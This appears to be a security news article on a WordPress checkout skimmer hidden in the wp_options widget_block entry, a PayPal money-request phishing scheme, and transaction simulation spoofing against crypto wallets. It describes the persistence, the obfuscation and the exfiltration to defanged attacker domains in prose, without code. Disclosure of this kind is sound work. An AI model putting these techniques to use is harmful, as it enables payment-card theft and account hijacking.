Cybersecurity researchers are warning of a new stealthy credit card skimmer campaign that targets WordPress e-commerce checkout pages by inserting malicious JavaScript code into a database table associated with the content management system (CMS).
“This credit card skimmer malware targeting WordPress websites silently injects malicious JavaScript into database entries to steal sensitive payment details,” Sucuri researcher Puja Srivastava said in a new analysis.
“The malware activates specifically on checkout pages, either by hijacking existing payment fields or injecting a fake credit card form.”
The GoDaddy-owned website security company said it discovered the malware embedded into the WordPress wp_options table with the option “widget_block,” thus allowing it to avoid detection by scanning tools and persist on compromised sites without attracting attention.
In doing so, the idea is to insert the malicious JavaScript into an HTML block widget through the WordPress admin panel (wp-admin > widgets).
The JavaScript code works by checking if the current page is a checkout page and ensures that it springs into action only after the site visitor is about to enter their payment details, at which point the it dynamically creates a bogus payment screen that mimics legitimate payment processors like Stripe.
The form is designed to capture users’ credit card numbers, expiration dates, CVV numbers, and billing information. Alternately, the rogue script is also capable of capturing data entered on legitimate payment screens in real-time to maximize compatibility.
The stolen data is subsequently Base64-encoded and combined with AES-CBC encryption to make it appear harmless and resist analysis attempts. In the final stage, it’s transmitted to an attacker-controlled server (“valhafather[.]xyz” or “fqbe23[.]xyz”).
The development comes more than a month after Sucuri highlighted a similar campaign that leveraged JavaScript malware to dynamically create fake credit card forms or extract data entered in payment fields on checkout pages.
The harvested information is then subjected to three layers of obfuscation by encoding it first as JSON, XOR-encrypting it with the key “script,” and finally using Base64-encoding, prior to exfiltration to a remote server (“staticfonts[.]com”).
“The script is designed to extract sensitive credit card information from specific fields on the checkout page,” Srivastava noted. “Then the malware collects additional user data through Magento’s APIs, including the user’s name, address, email, phone number, and other billing information. This data is retrieved via Magento’s customer-data and quote models.”
The disclosure also follows the discovery of a financially-motivated phishing email campaign that tricks recipients into clicking on PayPal login pages under the guise of an outstanding payment request to the tune of nearly $2,200.
“The scammer appears to have simply registered an Microsoft 365 test domain, which is free for three months, and then created a distribution list (Billingdepartments1[@]gkjyryfjy876.onmicrosoft.com) containing victim emails,” Fortinet FortiGuard Labs’ Carl Windsor said. “On the PayPal web portal, they simply request the money and add the distribution list as the address.”
What makes the campaign sneaky is the fact that the messages originate from a legitimate PayPal address (service@paypal.com) and contain a genuine sign in URL, which allows the emails to slip past security tools.
To make matters worse, as soon as the victim attempts to login to their PayPal account about the payment request, their account is automatically linked to the email address of the distribution list, permitting the threat actor to hijack control of the account.
In recent weeks, malicious actors have also been observed leveraging a novel technique called transaction simulation spoofing to steal cryptocurrency from victim wallets.
“Modern Web3 wallets incorporate transaction simulation as a user-friendly feature,” Scam Sniffer said. “This capability allows users to preview the expected outcome of their transactions before signing them. While designed to enhance transparency and user experience, attackers have found ways to exploit this mechanism.”
The infection chains involve taking advantage of the time gap between transaction simulation and execution, permitting attackers to set up fake sites mimicking decentralized apps (DApps) in order to carry out fraudulent wallet draining attacks.
“This new attack vector represents a significant evolution in phishing techniques,” the Web3 anti-scam solution provider said. “Rather than relying on simple deception, attackers are now exploiting trusted wallet features that users rely on for security. This sophisticated approach makes detection particularly challenging.”
